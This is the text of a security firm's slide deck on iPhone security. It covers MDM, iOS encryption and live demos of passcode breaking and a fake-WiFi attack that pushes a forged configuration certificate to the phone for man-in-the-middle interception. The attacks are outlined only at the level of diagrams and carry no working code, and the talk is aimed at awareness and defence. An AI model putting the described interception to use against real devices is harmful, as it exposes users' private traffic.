Welcome to 2 Beer-Talk - Compass Security...Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch...

Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch

Compass Security AG Werkstrasse 20 Postfach 2038 CH-8645 Jona

Welcome to 2nd Beer-Talk

iPhone Security

© Compass Security AG Slide 2 www.csnc.ch

Who am I ?

Riccardo Trombini, B.Sc. FHO in Computer Science

Business ª  Working in IT Security since 2000 ª  Study Information Technologies at FH in Rapperswil SG ª  IT Security Analyst, with Compass since 2009

Private ª  In a relationship with … ª  Apple follower, always in the !rst row ª  iOS Developer ª  Social Media enthusiast (fb, twitter,

foursqure, instagram .. )

Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch

Compass Security AG Werkstrasse 20 Postfach 2038 CH-8645 Jona

iPhone Security

© Compass Security AG Slide 4 www.csnc.ch

An Ideal World

Centralized management with a MDM solution, to •  Enforce security policies •  Monitor status of devices •  Real-time incident handling

Synchronization •  Encrypted channel •  Strong authentication

Fully Protected Device •  Access Control •  Strong Encryption •  Vulnerabilities

Fully Aware Users

© Compass Security AG Slide 5 www.csnc.ch

Sadly there is no such thing

Centralized management with a MDM solution, to •  Enforce security policies •  Monitor status of devices •  Real-time incident handling

Synchronization •  Encrypted channel •  Strong authentication

Fully Protected Device •  Access Control •  Strong Encryption •  Vulnerabilities

Fully Aware Users

© Compass Security AG Slide 6 www.csnc.ch

What is MDM?

•  Mobile Device Management

•  Centralized Management of mobile devices

© Compass Security AG Slide 7 www.csnc.ch

Functionality

•  OTA „Over The Air“ enrollment and pro!le distribution (con!g)

•  Easy synchronisation of Emails, Calendar, Contacts, ...

•  Enforce compliance policy

•  Monitor device status for inventory and compliance •  Device Information (UDID, iOS Version, Modem Version ..) •  Network Information (Carrier Settings, Data roaming status ..) •  Compliance & Security (Installed pro!les, certi!cates, passcode status ..)

•  Remote administration like •  Remote wipe •  Remote lock •  Passcode reset •  Locate device

© Compass Security AG Slide 8 www.csnc.ch

MDM != MDM – iOS Integration

Nativ iOS Apps Sandbox Client

© Compass Security AG Slide 9 www.csnc.ch

MDM != MDM – Network Design

NOC (Network Operation Center)

© Compass Security AG Slide 10 www.csnc.ch

MDM != MDM – Network Design

Direct Access to DMZ

Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch

Compass Security AG Werkstrasse 20 Postfach 2038 CH-8645 Jona

Demo #1

Break Passcode Protection Break File Encryption on iPhone

© Compass Security AG Slide 12 www.csnc.ch

iOS Security Controls

•  Full Disk Encryption •  Since iPhone 3GS •  AES CBC 256 bit •  does only provide one reason: Rapid device wiping •  FDE pretty useless. Kernel transparently decrypts requested !les

•  Data Protection API •  Introduced with iOS 4 •  Additional level of encryption •  File encryption can be tied to the Passcode

Encryption

© Compass Security AG Slide 13 www.csnc.ch

iOS Security Controls Encryption - Data Protection API

File Meta Data

File Key Class Key

Device Key

User Passcode Key

© Compass Security AG Slide 14 www.csnc.ch

BootRom-Attack

© Compass Security AG Slide 15 www.csnc.ch

Summary

•  User Awareness - Always know where your device is !

•  Enforce strong Passcode Policy with MDM! •  Length •  Alphanumeric •  Special characters •  C0mpa$$ … don’t ! •  Usability?

Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch

Compass Security AG Werkstrasse 20 Postfach 2038 CH-8645 Jona

LiveDemo [Free-WiFi-CertPush-Attack]

© Compass Security AG Slide 17 www.csnc.ch

WiFi-MidM…

Free-WiFi-Cert-Push-Attack

Free-WiFi Yeah! Free-WiFi available…

© Compass Security AG Slide 18 www.csnc.ch

Free-WiFi-Cert-Push-Attack

The Problem with the Certi!cate….

© Compass Security AG Slide 19 www.csnc.ch

Free-WiFi-Cert-Push-Attack

The Solution ;-)

© Compass Security AG Slide 20 www.csnc.ch

Free-WiFi-Cert-Push-Attack

Behavior of the iPhone … www.apple.com/library/test/success.html

HTTP GET request

OK

Hotspot Management

Hotspot Login-Site

Redirect

© Compass Security AG Slide 21 www.csnc.ch

Free-WiFi-Cert-Push-Attack

Cert-Push … www.apple.com/library/test/success.html

HTTP GET request

Attacker Host

Mobile Con!curation

Redirect

© Compass Security AG Slide 22 www.csnc.ch

Free-WiFi-Cert-Push-Attack

Make your own Apple Certi!cate

© Compass Security AG Slide 23 www.csnc.ch

Free-WiFi-Cert-Push-Attack

Result…

© Compass Security AG Slide 24 www.csnc.ch

Free-WiFi-Cert-Push-Attack

MitM with valid Cert

Attacker Host

Free-WiFi

© Compass Security AG Slide 25 www.csnc.ch

Summary

•  User Awareness •  Think before accepting con!gurations •  Be suspicious

•  Apple should improve certi!cate validation for mobile con!guration

•  Synchronization should be protected with two-way authentication

© Compass Security AG Slide 26 www.csnc.ch

Questions ?

© Compass Security AG Slide 27 www.csnc.ch